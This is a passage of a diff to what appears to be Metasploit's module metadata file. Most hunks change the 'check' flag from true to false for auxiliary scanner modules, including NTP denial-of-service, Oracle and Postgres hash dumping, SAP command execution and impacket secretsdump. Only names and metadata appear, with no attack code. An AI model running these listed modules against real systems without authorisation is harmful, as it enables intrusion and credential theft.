    "notes": {
@@ -35073,7 +35219,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_req_nonce_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35112,7 +35258,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_reslist_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35151,7 +35297,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_unsettrap_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35197,7 +35343,7 @@
    "path": "/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/openvas/openvas_gsad_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35234,7 +35380,7 @@
    "path": "/modules/auxiliary/scanner/openvas/openvas_omp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/openvas/openvas_omp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35271,7 +35417,7 @@
    "path": "/modules/auxiliary/scanner/openvas/openvas_otp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/openvas/openvas_otp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35317,7 +35463,7 @@
    "path": "/modules/auxiliary/scanner/oracle/emc_sid.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/emc_sid",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35364,7 +35510,7 @@
    "path": "/modules/auxiliary/scanner/oracle/isqlplus_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/isqlplus_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35411,7 +35557,7 @@
    "path": "/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/isqlplus_sidbrute",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35448,7 +35594,7 @@
    "path": "/modules/auxiliary/scanner/oracle/oracle_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/oracle_hashdump",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -35488,7 +35634,7 @@
    "path": "/modules/auxiliary/scanner/oracle/oracle_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/oracle_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35525,7 +35671,7 @@
    "path": "/modules/auxiliary/scanner/oracle/sid_brute.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/sid_brute",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35563,7 +35709,7 @@
    "path": "/modules/auxiliary/scanner/oracle/sid_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/sid_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35609,7 +35755,7 @@
    "path": "/modules/auxiliary/scanner/oracle/spy_sid.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/spy_sid",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35646,7 +35792,7 @@
    "path": "/modules/auxiliary/scanner/oracle/tnslsnr_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/tnslsnr_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35684,7 +35830,7 @@
    "path": "/modules/auxiliary/scanner/oracle/tnspoison_checker.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/tnspoison_checker",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35730,7 +35876,7 @@
    "path": "/modules/auxiliary/scanner/oracle/xdb_sid.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/xdb_sid",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35777,7 +35923,7 @@
    "path": "/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/xdb_sid_brute",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35814,7 +35960,7 @@
    "path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/pcanywhere/pcanywhere_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35851,7 +35997,7 @@
    "path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb",
    "is_install_path": true,
    "ref_name": "scanner/pcanywhere/pcanywhere_tcp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35888,7 +36034,7 @@
    "path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb",
    "is_install_path": true,
    "ref_name": "scanner/pcanywhere/pcanywhere_udp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35926,7 +36072,7 @@
    "path": "/modules/auxiliary/scanner/pop3/pop3_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/pop3/pop3_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35963,7 +36109,7 @@
    "path": "/modules/auxiliary/scanner/pop3/pop3_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/pop3/pop3_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36002,7 +36148,7 @@
    "path": "/modules/auxiliary/scanner/portmap/portmap_amp.rb",
    "is_install_path": true,
    "ref_name": "scanner/portmap/portmap_amp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36039,7 +36185,7 @@
    "path": "/modules/auxiliary/scanner/portscan/ack.rb",
    "is_install_path": true,
    "ref_name": "scanner/portscan/ack",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36077,7 +36223,7 @@
    "path": "/modules/auxiliary/scanner/portscan/ftpbounce.rb",
    "is_install_path": true,
    "ref_name": "scanner/portscan/ftpbounce",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36114,7 +36260,7 @@
    "path": "/modules/auxiliary/scanner/portscan/syn.rb",
    "is_install_path": true,
    "ref_name": "scanner/portscan/syn",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36152,7 +36298,7 @@
    "path": "/modules/auxiliary/scanner/portscan/tcp.rb",
    "is_install_path": true,
    "ref_name": "scanner/portscan/tcp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36189,7 +36335,7 @@
    "path": "/modules/auxiliary/scanner/portscan/xmas.rb",
    "is_install_path": true,
    "ref_name": "scanner/portscan/xmas",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36227,7 +36373,7 @@
    "path": "/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_dbname_flag_injection",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36264,7 +36410,7 @@
    "path": "/modules/auxiliary/scanner/postgres/postgres_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_hashdump",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -36303,7 +36449,7 @@
    "path": "/modules/auxiliary/scanner/postgres/postgres_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -36340,7 +36486,7 @@
    "path": "/modules/auxiliary/scanner/postgres/postgres_schemadump.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_schemadump",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -36377,7 +36523,7 @@
    "path": "/modules/auxiliary/scanner/postgres/postgres_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_version",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -36426,7 +36572,7 @@
    "path": "/modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/canon_iradv_pwd_extract",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -36467,7 +36613,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_delete_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_delete_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36508,7 +36654,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_download_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_download_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36549,7 +36695,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_env_vars.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_env_vars",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36590,7 +36736,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_list_dir.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_list_dir",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36631,7 +36777,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_list_volumes.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_list_volumes",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36672,7 +36818,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_ready_message.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_ready_message",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36713,7 +36859,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_upload_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_upload_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36754,7 +36900,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_version_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_version_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36791,7 +36937,7 @@
    "path": "/modules/auxiliary/scanner/quake/server_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/quake/server_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36918,7 +37064,7 @@
    "path": "/modules/auxiliary/scanner/rdp/rdp_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/rdp/rdp_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36958,7 +37104,7 @@
    "path": "/modules/auxiliary/scanner/redis/file_upload.rb",
    "is_install_path": true,
    "ref_name": "scanner/redis/file_upload",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36995,7 +37141,7 @@
    "path": "/modules/auxiliary/scanner/redis/redis_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/redis/redis_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -37033,7 +37179,7 @@
    "path": "/modules/auxiliary/scanner/redis/redis_server.rb",
    "is_install_path": true,
    "ref_name": "scanner/redis/redis_server",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37107,7 +37253,7 @@
    "path": "/modules/auxiliary/scanner/rogue/rogue_send.rb",
    "is_install_path": true,
    "ref_name": "scanner/rogue/rogue_send",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37145,7 +37291,7 @@
    "path": "/modules/auxiliary/scanner/rservices/rexec_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/rservices/rexec_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -37183,7 +37329,7 @@
    "path": "/modules/auxiliary/scanner/rservices/rlogin_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/rservices/rlogin_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -37221,7 +37367,7 @@
    "path": "/modules/auxiliary/scanner/rservices/rsh_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/rservices/rsh_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -37260,7 +37406,7 @@
    "path": "/modules/auxiliary/scanner/rsync/modules_list.rb",
    "is_install_path": true,
    "ref_name": "scanner/rsync/modules_list",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37308,7 +37454,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_ctc_verb_tampering_user_mgmt",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -37359,7 +37505,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_hostctrl_getcomputersystem",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37407,7 +37553,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_icf_public_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_icf_public_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37453,7 +37599,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_icm_urlscan",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37500,7 +37646,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_abaplog",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37547,7 +37693,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_brute_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -37594,7 +37740,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_extractusers",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37641,7 +37787,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getaccesspoints",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37688,7 +37834,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getenv",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37736,7 +37882,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getlogfiles",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37784,7 +37930,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getprocesslist",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37831,7 +37977,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getprocessparameter",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37878,7 +38024,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_instanceproperties",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37926,7 +38072,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_listconfigfiles",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37973,7 +38119,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_listlogfiles",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -38020,7 +38166,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_startprofile",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -38067,7 +38213,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -38107,7 +38253,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_router_info_request.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_router_info_request",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -38186,7 +38332,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_service_discovery.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_service_discovery",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -38234,7 +38380,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_smb_relay.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_smb_relay",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -38281,7 +38427,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_bapi_user_create1",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38328,7 +38474,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_brute_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -38375,7 +38521,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38422,7 +38568,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38468,7 +38614,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_eps_get_directory_listing",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38517,7 +38663,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_pfl_check_os_file_existence",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38564,7 +38710,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_ping",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38611,7 +38757,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_read_table",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38659,7 +38805,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_rzl_read_dir",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38706,7 +38852,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_susr_rfc_user_interface",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38753,7 +38899,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_sxpg_call_system_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38800,7 +38946,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_sxpg_command_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38849,7 +38995,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_system_info",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38896,7 +39042,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_th_saprel_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38942,7 +39088,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_web_gui_brute_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -38980,7 +39126,7 @@
    "path": "/modules/auxiliary/scanner/scada/digi_addp_reboot.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/digi_addp_reboot",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -39018,7 +39164,7 @@
    "path": "/modules/auxiliary/scanner/scada/digi_addp_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/digi_addp_version",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -39056,7 +39202,7 @@
    "path": "/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/digi_realport_serialport_scan",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39094,7 +39240,7 @@
    "path": "/modules/auxiliary/scanner/scada/digi_realport_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/digi_realport_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39144,7 +39290,7 @@
    "path": "/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/indusoft_ntwebserver_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39182,7 +39328,7 @@
    "path": "/modules/auxiliary/scanner/scada/koyo_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/koyo_login",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39299,7 +39445,7 @@
    "path": "/modules/auxiliary/scanner/scada/modbusdetect.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/modbusdetect",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39338,7 +39484,7 @@
    "path": "/modules/auxiliary/scanner/scada/moxa_discover.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/moxa_discover",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39455,7 +39601,7 @@
    "path": "/modules/auxiliary/scanner/scada/sielco_winlog_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/scada/sielco_winlog_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39492,7 +39638,7 @@
    "path": "/modules/auxiliary/scanner/sip/enumerator.rb",
    "is_install_path": true,
    "ref_name": "scanner/sip/enumerator",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39529,7 +39675,7 @@
    "path": "/modules/auxiliary/scanner/sip/enumerator_tcp.rb",
    "is_install_path": true,
    "ref_name": "scanner/sip/enumerator_tcp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39566,7 +39712,7 @@
    "path": "/modules/auxiliary/scanner/sip/options.rb",
    "is_install_path": true,
    "ref_name": "scanner/sip/options",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39603,7 +39749,7 @@
    "path": "/modules/auxiliary/scanner/sip/options_tcp.rb",
    "is_install_path": true,
    "ref_name": "scanner/sip/options_tcp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39678,11 +39824,11 @@

    ],
    "targets": null,
-    "mod_time": "2018-08-27 16:06:07 +0000",
+    "mod_time": "2019-10-31 14:15:32 +0000",
    "path": "/modules/auxiliary/scanner/smb/impacket/dcomexec.py",
    "is_install_path": true,
    "ref_name": "scanner/smb/impacket/dcomexec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -39730,11 +39876,11 @@

    ],
    "targets": null,
-    "mod_time": "2018-08-27 16:06:07 +0000",
+    "mod_time": "2019-10-31 14:15:32 +0000",
    "path": "/modules/auxiliary/scanner/smb/impacket/secretsdump.py",
    "is_install_path": true,
    "ref_name": "scanner/smb/impacket/secretsdump",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -39771,11 +39917,11 @@

    ],
    "targets": null,
-    "mod_time": "2018-08-27 16:06:07 +0000",
+    "mod_time": "2019-10-31 14:15:32 +0000",
    "path": "/modules/auxiliary/scanner/smb/impacket/wmiexec.py",
    "is_install_path": true,
    "ref_name": "scanner/smb/impacket/wmiexec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -39817,7 +39963,7 @@
    "path": "/modules/auxiliary/scanner/smb/pipe_auditor.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/pipe_auditor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39856,7 +40002,7 @@
    "path": "/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/pipe_dcerpc_auditor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39898,7 +40044,7 @@
    "path": "/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/psexec_loggedin_users",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39935,7 +40081,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb1.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb1",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -39972,7 +40118,7 @@
    "path": "/modules/auxiliary/scanner/smb/smb2.rb",
